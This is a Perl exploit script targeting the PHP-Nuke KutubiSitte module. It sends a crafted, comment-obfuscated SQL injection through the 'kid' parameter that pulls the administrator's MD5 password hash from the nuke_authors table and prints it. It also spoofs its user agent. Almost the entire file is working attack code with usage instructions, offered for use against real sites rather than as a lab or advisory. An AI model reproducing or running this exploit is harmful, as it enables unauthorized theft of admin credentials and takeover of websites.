|
|
#!/usr/bin/perl =0D
use Getopt::Std;=0D
use LWP::UserAgent;=0D
=0D
sub usg{=0D
printf("=0D
=0D
=0D
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-=0D
| PHP-NUKE KutubiSitte [kid] => SQL Injection |=0D
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-=0D
#######################################################=0D
# Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #=0D
#######################################################=0D
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
#:-------------------------------------------------------:#=0D
:#| USAGE: |#:=0D
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:=0D
#:-------------------------------------------------------:#=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
#:-------------------------------------------------------:#=0D
:#| EXAMPLE: |#:=0D
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:=0D
#:-------------------------------------------------------:#=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
=0D
=0D
");=0D
}=0D
sub problem{=0D
print "\n\n[~] SITO NON VULNERABILE [~]\n\n";=0D
exit();=0D
}=0D
sub exploitation{=0D
=0D
$conn = LWP::UserAgent -> new;=0D
$conn->agent('Checkbot/0.4 ');=0D
$query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";=0D
$return_pwd = $conn->get($query_pwd) || problem();=0D
$return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();=0D
print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";=0D
}=0D
=0D
getopts(":h:p:U:",\%args);=0D
$host = $args{h} if (defined $args{h});=0D
$path = $args{p} if (defined $args{p});=0D
$user_id= $args{U}if (defined $args{U});=0D
=0D
if (!defined $args{h} || !defined $args{p} || !defined $args{U}){=0D
usg();=0D
}=0D
else{=0D
exploitation();=0D
}